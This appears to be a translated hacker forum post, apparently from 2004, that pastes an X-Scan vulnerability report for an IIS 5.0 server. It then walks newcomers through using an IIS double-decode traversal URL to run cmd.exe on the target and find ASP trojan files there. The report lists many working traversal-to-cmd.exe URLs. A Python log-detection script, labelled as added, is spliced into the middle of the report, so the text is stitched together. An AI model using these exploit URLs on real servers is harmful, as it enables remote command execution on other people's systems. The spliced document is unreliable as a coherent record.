Bored today and can't even get home, heh~~ A friend asked me to test a site.
Opened the address and was stunned!! Maybe he was deliberately making it hard for me; after opening the address it just showed this:
[[[The site you are trying to connect to currently has no default page. It may be in the process of being upgraded.
Please try this site again later. If the problem persists, please contact the Web site administrator. ]]]
Heh!!
No fear. As the old saying goes, if you can't scan, you're not a real hacker.
Time for X-Scan to take the stage.
****.**.**.**
The scan results are as follows:
X-Scan Detection Report
------------------
Detection results
- Live hosts : 1
- Vulnerabilities : 22
- Warnings : 16
- Notices : 6
Host list
****.**.**.** (security vulnerabilities found)
. OS: Windows; PORT/TCP: 21, 25, 53, 80, 443
Details
****.**.**.** :
. Open port list :
o smtp (25/tcp) (security warning found)
o domain (53/tcp) (security notice found)
o www (80/tcp) (security vulnerability found)
o https (443/tcp) (security notice found)
o ftp (21/tcp) (security notice found)
. Port "smtp (25/tcp)" security warning found :
The SMTP server does not support user authentication and allows anonymous users to use it
. Port "smtp (25/tcp)" security notice found :
A SMTP server is running on this port
Here is its banner :
220 altsyz-web Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966 ready at
Wed, 20 Oct 2004 06:28:38 +0800
NESSUS_ID : 10330
. Port "domain (53/tcp)" security notice found :
Maybe the "domain" service running on this port.
NESSUS_ID : 10330
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+di
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%%35c..%%35c..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
http://****.**.**.**/scripts/..%u00255c..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir
. Port "www (80/tcp)" security vulnerability found :
IIS encoding/decoding vulnerability:
. Port "www (80/tcp)" security vulnerability found :
The remote Microsoft Frontpage server seems vulnerable to a remote
buffer overflow. Exploitation of this bug could give an unauthorized
user access to the machine.
The following systems are known to be vulnerable:
Microsoft Windows 2000 Service Pack 2, Service Pack 3
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Office XP, Microsoft Office XP Service Release 1
Solution: Install relevant service pack or hotfix from URL below.
See also
http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx
Risk factor : High
CVE_ID : CAN-2003-0822, CAN-2003-0824
NESSUS_ID : 11923
Other references : IAVA:2003-A-0033
. Port "www (80/tcp)" security vulnerability found :
There's a buffer overflow in the remote web server through
the ISAPI filter.
It is possible to overflow the remote web server and execute
commands as user SYSTEM.
Solution: See
http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx
Risk factor : High
CVE_ID : CVE-2001-0544, CVE-2001-0545, CVE-2001-0506, CVE-2001-0507,
CVE-2001-0508, CVE-2001-0500
BUGTRAQ_ID : 2690, 3190, 3194, 3195
NESSUS_ID : 10685
. Port "www (80/tcp)" security vulnerability found :
The IIS server appears to have the .HTR ISAPI filter mapped.
At least one remote vulnerability has been discovered for the .HTR
filter. This is detailed in Microsoft Advisory
MS02-018, and gives remote SYSTEM level access to the web server.
It is recommended that, even if you have patched this vulnerability,
you unmap the .HTR extension and any other unused ISAPI extensions
if they are not required for the operation of your site.
Solution :
To unmap the .HTR extension:
1.Open Internet Services Manager.
2.Right-click the Web server choose Properties from the context menu.
3.Master Properties
4.Select WWW Service -> Edit -> HomeDirectory -> Configuration
and remove the reference to .htr from the list.
In addition, you may wish to download and install URLSCAN from the
Microsoft Technet Website. URLSCAN, by default, blocks all requests
for .htr files.
Risk factor : High
CVE_ID : CVE-2002-0071
BUGTRAQ_ID : 4474
NESSUS_ID : 10932
Other references : IAVA:2002-A-0002
. Port "www (80/tcp)" security vulnerability found :
The remote server is vulnerable to a buffer overflow in the .HTR
filter.
An attacker may use this flaw to execute arbitrary code on
this host (although the exploitation of this flaw is considered
as being difficult).
Solution:
To unmap the .HTR extension:
1.Open Internet Services Manager.
2.Right-click the Web server choose Properties from the context menu.
3.Master Properties
4.Select WWW Service -> Edit -> HomeDirectory -> Configuration
and remove the reference to .htr from the list.
See MS bulletin MS02-028 for a patch
Risk factor : High
CVE_ID : CVE-2002-0364, CVE-2002-0071
BUGTRAQ_ID : 4855
NESSUS_ID : 11028
Other references : IAVA:2002-A-0002
. Port "www (80/tcp)" security vulnerability found :
The remote WebDAV server may be vulnerable to a buffer overflow when
it receives a too long request.
An attacker may use this flaw to execute arbitrary code within the
LocalSystem security context.
*** As safe checks are enabled, Nessus did not actually test for this
*** flaw, so this might be a false positive
Solution : See
http://www.microsoft.com/technet/security/bulletin/ms03-007.mspx
Risk Factor : High
CVE_ID : CAN-2003-0109
BUGTRAQ_ID : 7116
NESSUS_ID : 11412
Other references : IAVA:2003-A-0005
. Port "www (80/tcp)" security vulnerability found :
When IIS receives a user request to run a script, it renders
the request in a decoded canonical form, then performs
security checks on the decoded request. A vulnerability
results because a second, superfluous decoding pass is
performed after the initial security checks are completed.
Thus, a specially crafted request could allow an attacker to
execute arbitrary commands on the IIS Server.
Solution: See MS advisory MS01-026(Superseded by ms01-044)
See http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx
Risk factor : High
CVE_ID : CVE-2001-0507, CVE-2001-0333
BUGTRAQ_ID : 2708
NESSUS_ID : 10671
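The decoding order described in this finding, shown as an added Python example that is not part of the original post, of X-Scan or of Nessus: it runs a traversal check on a request path after one decoding pass (the order IIS used) and again on the fully canonical path, so the paths that only the second check catches are exactly what the superfluous second decode let through. The sample paths are constructed from the encodings in the report above; the function names and verdict strings are my own.

```python
import re

# A ".." path segment in either slash direction (IIS accepts both).
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")

# Constructed sample request paths modelled on the report above: %255c,
# %25%35%63, %%35c and %u00255c each need two decoding passes to become "\".
SAMPLE_PATHS = [
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe",
    "/scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe",
    "/scripts/..%%35c..%%35cwinnt/system32/cmd.exe",
    "/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe",
    "/scripts/../../winnt/system32/cmd.exe",
    "/scripts/index.asp",
]

def decode_once(path):
    """A single left-to-right pass over %XX and IIS-style %uXXXX sequences."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", repl, path)

def canonicalize(path, max_passes=4):
    """Decode until the path stops changing; bounded so crafted input can't loop."""
    for _ in range(max_passes):
        decoded = decode_once(path)
        if decoded == path:
            break
        path = decoded
    return path

def classify(path):
    """Check the path after one decode (the order IIS used) and after full
    canonicalization; anything caught only by the second check is what the
    superfluous second decoding pass let through."""
    seen_once = bool(TRAVERSAL.search(decode_once(path)))
    seen_full = bool(TRAVERSAL.search(canonicalize(path)))
    if seen_full and not seen_once:
        return "double-encoded traversal"
    return "traversal" if seen_full else "clean"

def scan(paths):
    """Verdict per path, e.g. for request paths pulled from IIS logs."""
    return [(p, classify(p)) for p in paths]

if __name__ == "__main__":
    for path, verdict in scan(SAMPLE_PATHS):
        print(f"{verdict:25} {path}")
```

The fix the bulletin describes amounts to running the check on the canonical form only; the same comparison works as a log-review filter for requests that a single-decode check would have passed.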
. Port "www (80/tcp)" security vulnerability found :
There's a buffer overflow in the remote web server through
the ASP ISAPI filter.
It is possible to overflow the remote web server and execute
commands as user SYSTEM.
Solution: See
http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx
Risk factor : High
CVE_ID : CVE-2002-0079, CVE-2002-0147, CVE-2002-0149
BUGTRAQ_ID : 4485
NESSUS_ID : 10935
Other references : IAVA:2002-A-0002
. Port "www (80/tcp)" security warning found :
. Port "www (80/tcp)" security notice found :
A web server is running on this port
NESSUS_ID : 10330
. Port "www (80/tcp)" security notice found :
The remote web server type is :
Microsoft-IIS/5.0
Solution : You can use urlscan to change reported server for IIS.
NESSUS_ID : 10107
. Port "https (443/tcp)" security notice found :
Maybe the "https" service running on this port.
NESSUS_ID : 10330
. Port "ftp (21/tcp)" security notice found :
Maybe the "ftp" service running on this port.
NESSUS_ID : 10330
The result: an IIS decoding vulnerability was found.
So how do you use it? Experts don't need to ask.
Newbies, read on >>>
Notice this: http://***.**.**.**/scripts/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
What I need to make clear here is that I am talking about finding ASP trojan backdoors,
not doing any other intrusion.
Next we open it, and what do we find.................. haha
Directory of d:\inetpub\scripts
2004-10-20 11:18 <DIR> .
2004-10-20 11:18 <DIR> ..
2004-10-20 10:34 1,169 admin_nighter.asp
2004-10-20 10:48 29,451 nighterasp1.5.asp
2000-02-09 22:39 15,760 NSIISLOG.DLL
2004-10-20 10:33 3,224 sniao.asp
2004-10-20 09:30 23,109 start.asp
2004-10-20 11:18 49,627 sx.asp
By now you should understand what is going on.
Path: d:\inetpub
File path: \scripts\
admin_nighter.asp
This is the trojan.